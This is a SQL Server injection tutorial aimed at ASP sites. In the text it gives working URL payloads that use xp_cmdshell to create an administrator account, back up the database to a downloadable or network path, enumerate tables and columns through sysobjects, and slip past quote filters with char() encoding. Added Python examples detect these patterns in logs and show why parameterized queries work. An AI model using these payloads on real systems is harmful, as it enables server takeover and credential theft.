Network SQL Injection and Prevention: Advanced Article


Section 1: Using system tables to inject SQL Server databases

SQL Server is a powerful database system that is also tightly integrated with the operating system. This is a great convenience for developers, but on the other hand it also gives an injector a springboard. Let us first look at a few concrete examples:

① http://site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--

In SQL Server the semicolon (;) separates two statements, and -- marks everything after it as a comment, so SQL Server splits this request into two statements: first it selects the record with id=1, then it executes the stored procedure xp_cmdshell. That stored procedure invokes operating system commands, so the net command creates a new Windows account with user name name and password password. Then:

② http://site/url.asp?id=1;exec master..xp_cmdshell "net localgroup name Administrators /add"--

This adds the new account name to the Administrators group, and in less than two minutes you hold the highest privileges on the system! Of course, this only works when the database connection uses the sa account; otherwise there is no permission to invoke xp_cmdshell.

③ http://site/url.asp?id=1 and db_name()>0

A similar example is and user>0, which reveals the user name of the connection. db_name() is another built-in function; it returns the name of the database the connection is using.

④ http://site/url.asp?id=1;backup database name to disk='c:\inetpub\wwwroot\1.db';--

This is quite a trick: ③ gives the database name, and an IIS error message exposes the absolute path, so the database is backed up into the web directory and the whole database is then downloaded over HTTP. Every admin and user password is in plain view! When the absolute path is unknown, you can also back up to a network address (such as \\202.96.xx.xx\Share\1.db), but the success rate is not high.

⑤ http://site/url.asp?id=1 and (select top 1 name from sysobjects where xtype='U' and status>0)>0

As mentioned earlier, sysobjects is the SQL Server system table that stores all tables, views, constraints and other objects. The condition xtype='U' and status>0 selects the tables created by the user, and the statement above takes the first such table name and compares it with 0, so that the error message exposes the table name. How to get the second and third table names? We leave that for our smart readers to think about.

⑥ http://site/url.asp?id=1 and (select top 1 col_name(object_id('table name'),1) from sysobjects)>0

After getting the table name from ⑤, use object_id('table name') to obtain the table's internal id; col_name(table id, 1) then returns the name of the table's first column, and replacing 1 with 2, 3, 4, ... yields the column names of the guessed table one by one.
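The six request shapes above are also what a defender looks for in web-server logs. The following added example (not from the original article) decodes the query string of constructed IIS-style log lines and flags the stacked xp_cmdshell call, the backup-to-disk trick, the system-catalogue probes and char()-encoded literals; the log lines and rule names are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time method cs-uri-stem cs-uri-query status)
# that mirror the request shapes discussed above; none come from a real server.
SAMPLE_LOG = "\n".join([
    "2004-06-01 10:00:01 GET /url.asp id=1 200",
    "2004-06-01 10:00:02 GET /url.asp id=1;exec+master..xp_cmdshell+%22net+user+name+password+/add%22-- 500",
    "2004-06-01 10:00:03 GET /url.asp id=1+and+db_name()%3E0 500",
    r"2004-06-01 10:00:04 GET /url.asp id=1;backup+database+name+to+disk%3D'c:\inetpub\wwwroot\1.db';-- 500",
    "2004-06-01 10:00:05 GET /url.asp id=1+and+(select+top+1+name+from+sysobjects+where+xtype%3Dchar(85)+and+status%3E0)%3E0 500",
    "2004-06-01 10:00:06 GET /url.asp id=1+and+(select+top+1+col_name(object_id('tbl'),1)+from+sysobjects)%3E0 500",
])

# Each rule is matched against the URL-decoded query string (case-insensitive).
RULES = [
    ("stacked xp_cmdshell", re.compile(r";\s*exec\b.*xp_cmdshell", re.I)),
    ("backup database to disk", re.compile(r";\s*backup\s+database\b.*\bto\s+disk\b", re.I)),
    ("system catalogue probe",
     re.compile(r"\b(sysobjects\b|col_name\s*\(|object_id\s*\(|db_name\s*\()", re.I)),
    ("char()-encoded literal", re.compile(r"\bn?char\s*\(\s*\d+\s*\)", re.I)),
]


def scan(log_text):
    """Return [(line_number, [matched rule names])] for suspicious requests."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 5:
            continue
        # Decode %xx sequences and '+' exactly as the web server would before
        # the value reaches the ASP page, so encoding does not hide the pattern.
        query = unquote_plus(parts[4])
        matched = [name for name, rx in RULES if rx.search(query)]
        if matched:
            hits.append((n, matched))
    return hits


if __name__ == "__main__":
    for line_no, rules in scan(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(rules)}")
```

Lines carrying a semicolon plus exec or backup deserve an alert on their own; the catalogue probes and char() literals are weaker signals that become convincing when several arrive from one client in a short window.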

The above six points are the painstaking crystallization of my more than six months of studying SQL Server injection. You can see that understanding SQL Server directly affects the success rate and the speed of guessing. After studying SQL Server injection, my level in development has also improved greatly; perhaps security and development complement each other.

Section 2: Bypassing program restrictions to continue injecting

In the introductory article, many people like to use the single-quote (') test to find injection holes, so many people also filter the ' character as a way to "prevent" injection vulnerabilities. That may block some beginners' attacks, but someone more familiar with SQL injection can still use the relevant functions to circumvent the program's restriction.

In the "General steps of SQL injection" section, the statements I use were optimized so that they contain no single quotes; in "Using system tables to inject SQL Server databases", some statements do contain the ' character. Let us take an example to see how these statements can be modified:

Take the simple case where xtype='U': the character U has ASCII code 85, so it can be replaced with where xtype=char(85). If the character is Chinese, for example where name='用户' (the word for user), you can use where name=nchar(29992)+nchar(25143) instead.
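The reason quote filtering fails is that the injection in ⑤ sits in a numeric context (id=1 and ...) where no quote is ever needed, and char() supplies the string literal. The added example below (not from the original article) reproduces that on an in-memory SQLite database with a constructed items table and a stand-in sysobjects table: the quote-stripping lookup still answers the char(85) probe, while the hardened lookup validates the type and binds the value as a parameter. Table contents and function names are assumptions for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the article's setup: a lookup table plus a
    mimic of the SQL Server sysobjects catalogue (xtype 'U' = user table)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE items (id INTEGER, name TEXT);
        INSERT INTO items VALUES (1, 'public item');
        CREATE TABLE sysobjects (name TEXT, xtype TEXT, status INTEGER);
        INSERT INTO sysobjects VALUES ('admin', 'U', 1), ('items', 'U', 1);
    """)
    return con


def strip_quotes(value):
    """The 'filter the single quote' defence the article says many sites rely on."""
    return value.replace("'", "")


def lookup_vulnerable(con, raw_id):
    """String concatenation in a numeric context: the filter never triggers
    because a probe such as  1 and (...xtype=char(85))>0  contains no quote."""
    sql = "SELECT name FROM items WHERE id=" + strip_quotes(raw_id)
    return [row[0] for row in con.execute(sql)]


def lookup_hardened(con, raw_id):
    """Validate the type, then bind the value; the SQL text never changes."""
    try:
        item_id = int(raw_id)          # anything but an integer is rejected
    except ValueError:
        return []
    rows = con.execute("SELECT name FROM items WHERE id=?", (item_id,))
    return [row[0] for row in rows]


# char(85) is 'U', so this asks "does a user table exist?" without any quote.
PROBE_TRUE = "1 and (select count(*) from sysobjects where xtype=char(85))>0"
# char(88) is 'X'; no such xtype, so the same query returns nothing.
PROBE_FALSE = "1 and (select count(*) from sysobjects where xtype=char(88))>0"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true probe :", lookup_vulnerable(db, PROBE_TRUE))
    print("vulnerable, false probe:", lookup_vulnerable(db, PROBE_FALSE))
    print("hardened,   true probe :", lookup_hardened(db, PROBE_TRUE))
```

The two vulnerable calls differ only in the injected condition yet return different results, which is exactly the yes/no oracle the page's sysobjects probes rely on; the parameterized version gives the attacker nothing to compare.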
